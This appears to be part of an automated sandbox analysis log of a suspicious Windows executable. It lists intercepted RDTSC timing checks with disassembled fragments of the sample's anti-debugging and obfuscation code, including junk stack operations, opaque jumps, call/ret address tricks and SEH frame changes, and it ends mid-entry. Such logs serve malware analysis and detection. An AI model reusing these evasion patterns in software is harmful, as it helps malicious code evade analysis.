Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7D0A3 second address: A7D0B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FDC0050BD46h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7D0B3 second address: A7D0B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7D0B7 second address: A7D0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FDC0050BD46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7DAEE second address: A7DAF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7DAF2 second address: A7DB17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDC0050BD46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDC0050BD57h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7DDE3 second address: A7DDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A84412 second address: A8441D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A47476 second address: A4747A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4747A second address: A47490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A897A9 second address: A897C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FDC00CE27A6h 0x0000000a jmp 00007FDC00CE27B0h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A897C3 second address: A897C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A897C7 second address: A897E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007FDC00CE27AAh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4A8D4 second address: A4A8E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FDC0050BD4Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A88D4C second address: A88D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007FDC00CE27A6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8931F second address: A89327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8B1C0 second address: A8B1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 xor dword ptr [esp], 3944E506h 0x0000000c cld 0x0000000d push 781F51C9h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8B605 second address: A8B61C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8B61C second address: A8B622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8B7EB second address: A8B7FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8BDC3 second address: A8BDC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8BDC8 second address: A8BDDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FDC0050BD46h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8BDDD second address: A8BDF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8BDF4 second address: A8BDFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FDC0050BD46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8BF41 second address: A8BF47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8C37A second address: A8C380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8C380 second address: A8C392 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDC00CE27A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8C392 second address: A8C396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8E223 second address: A8E227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8E227 second address: A8E235 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FDC0050BD4Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8D9D6 second address: A8D9FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FDC00CE27A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 jmp 00007FDC00CE27B6h 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8E235 second address: A8E241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8D9FF second address: A8DA1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC00CE27B8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8E241 second address: A8E2E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FDC0050BD48h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 sub edi, 6800C7F3h 0x0000002a push 00000000h 0x0000002c or esi, dword ptr [ebp+129E1E66h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007FDC0050BD48h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e call 00007FDC0050BD55h 0x00000053 jbe 00007FDC0050BD4Ch 0x00000059 jp 00007FDC0050BD46h 0x0000005f pop esi 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FDC0050BD51h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8ED6E second address: A8EE13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jne 00007FDC00CE27A6h 0x00000010 jmp 00007FDC00CE27B9h 0x00000015 popad 0x00000016 jnp 00007FDC00CE27A8h 0x0000001c popad 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007FDC00CE27A8h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 adc esi, 6C92E0C3h 0x0000003e add si, 9E25h 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ebp 0x00000048 call 00007FDC00CE27A8h 0x0000004d pop ebp 0x0000004e mov dword ptr [esp+04h], ebp 0x00000052 add dword ptr [esp+04h], 0000001Bh 0x0000005a inc ebp 0x0000005b push ebp 0x0000005c ret 0x0000005d pop ebp 0x0000005e ret 0x0000005f mov dword ptr [ebp+129E1BA5h], esi 0x00000065 push 00000000h 0x00000067 mov di, ax 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007FDC00CE27B3h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A8EE13 second address: A8EE19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A90E5C second address: A90E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A90E61 second address: A90E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A90E67 second address: A90E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A90E6B second address: A90E82 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDC0050BD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FDC0050BD48h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A90E82 second address: A90F03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+129E196Dh], eax 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FDC00CE27A8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c jmp 00007FDC00CE27AFh 0x00000031 push 00000000h 0x00000033 mov esi, dword ptr [ebp+129E2A85h] 0x00000039 xchg eax, ebx 0x0000003a jmp 00007FDC00CE27B7h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jl 00007FDC00CE27A6h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A90F03 second address: A90F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A90F07 second address: A90F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A90F0D second address: A90F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A93B11 second address: A93B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A93B1C second address: A93B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007FDC0050BD5Eh 0x0000000b popad 0x0000000c nop 0x0000000d jl 00007FDC0050BD4Bh 0x00000013 mov esi, 003C622Ah 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007FDC0050BD48h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 stc 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+129E1A08h], ecx 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FDC0050BD4Eh 0x00000045 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9722C second address: A97242 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FDC00CE27ACh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A97776 second address: A9777B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9777B second address: A9779E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDC00CE27B9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9779E second address: A977A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A977A4 second address: A977A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A977A8 second address: A977AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9994A second address: A99A15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDC00CE27B9h 0x00000008 jmp 00007FDC00CE27ABh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FDC00CE27B5h 0x00000016 nop 0x00000017 mov dword ptr [ebp+129E3279h], edx 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007FDC00CE27A8h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 xor di, 863Eh 0x0000003e xor dword ptr [ebp+129E3874h], ebx 0x00000044 push 00000000h 0x00000046 push 00000000h 0x00000048 push ebp 0x00000049 call 00007FDC00CE27A8h 0x0000004e pop ebp 0x0000004f mov dword ptr [esp+04h], ebp 0x00000053 add dword ptr [esp+04h], 00000017h 0x0000005b inc ebp 0x0000005c push ebp 0x0000005d ret 0x0000005e pop ebp 0x0000005f ret 0x00000060 mov dword ptr [ebp+129E1A25h], edi 0x00000066 mov edi, dword ptr [ebp+129E2BE9h] 0x0000006c xchg eax, esi 0x0000006d jmp 00007FDC00CE27B1h 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 push edx 0x00000076 jmp 00007FDC00CE27B7h 0x0000007b pop edx 0x0000007c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9AAAC second address: A9AAC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9AAC3 second address: A9AAE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnp 00007FDC00CE27A6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9AAE2 second address: A9AAE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A97948 second address: A97962 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDC00CE27A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jno 00007FDC00CE27A6h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A97962 second address: A979D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 nop 0x00000007 mov ebx, 06FEF800h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov dword ptr fs:[00000000h], esp 0x0000001a or edi, 295FB2EDh 0x00000020 mov eax, dword ptr [ebp+129E03D5h] 0x00000026 jbe 00007FDC0050BD4Ch 0x0000002c sub ebx, dword ptr [ebp+129E30BBh] 0x00000032 push FFFFFFFFh 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007FDC0050BD48h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e jmp 00007FDC0050BD52h 0x00000053 nop 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 pushad 0x00000058 popad 0x00000059 push ebx 0x0000005a pop ebx 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4F823 second address: A4F827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4F827 second address: A4F82B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4F82B second address: A4F831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4F831 second address: A4F850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FDC0050BD46h 0x0000000e jmp 00007FDC0050BD51h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4F850 second address: A4F85A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4F85A second address: A4F87F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FDC0050BD57h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9F45E second address: A9F4CA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDC00CE27A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007FDC00CE27AEh 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007FDC00CE27A8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 movzx edi, si 0x00000037 pushad 0x00000038 mov edi, 50E7AEA0h 0x0000003d mov al, 08h 0x0000003f popad 0x00000040 push 00000000h 0x00000042 sub dword ptr [ebp+12B94B32h], eax 0x00000048 push 00000000h 0x0000004a mov ebx, edx 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e je 00007FDC00CE27A8h 0x00000054 push esi 0x00000055 pop esi 0x00000056 pop eax 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push ebx 0x0000005d pop ebx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9F4CA second address: A9F4CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9F4CE second address: A9F4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A98AF5 second address: A98B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FDC0050BD4Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A98B0D second address: A98B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC00CE27B2h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A98B24 second address: A98B40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC0050BD58h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A99B3B second address: A99B41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A99B41 second address: A99B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A99B45 second address: A99B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A99B49 second address: A99BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ebx, 1D4FBF90h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FDC0050BD48h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov di, 6C07h 0x00000033 mov dword ptr [ebp+129E3014h], edx 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 sub dword ptr [ebp+12B94B32h], ecx 0x00000046 mov ebx, 57D63721h 0x0000004b mov eax, dword ptr [ebp+129E0951h] 0x00000051 mov ebx, dword ptr [ebp+129E1F91h] 0x00000057 jmp 00007FDC0050BD51h 0x0000005c push FFFFFFFFh 0x0000005e push 00000000h 0x00000060 push esi 0x00000061 call 00007FDC0050BD48h 0x00000066 pop esi 0x00000067 mov dword ptr [esp+04h], esi 0x0000006b 